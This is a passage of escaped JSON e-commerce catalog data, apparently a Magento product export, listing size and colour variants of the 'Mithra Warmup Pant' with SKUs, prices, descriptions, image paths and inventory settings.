Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-32-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Orange\"},\"746\":{\"sku\":\"MP06-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-33-Gray\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"747\":{\"sku\":\"MP06-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-33-Green\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"748\":{\"sku\":\"MP06-33-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-33-Orange\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-33-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Orange\"},\"749\":{\"sku\":\"MP06-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-34-Gray\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"750\":{\"sku\":\"MP06-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-34-Green\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"751\":{\"sku\":\"MP06-34-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-34-Orange\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-34-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Orange\"},\"752\":{\"sku\":\"MP06-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-36-Gray\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"753\":{\"sku\":\"MP06-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-36-Green\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"m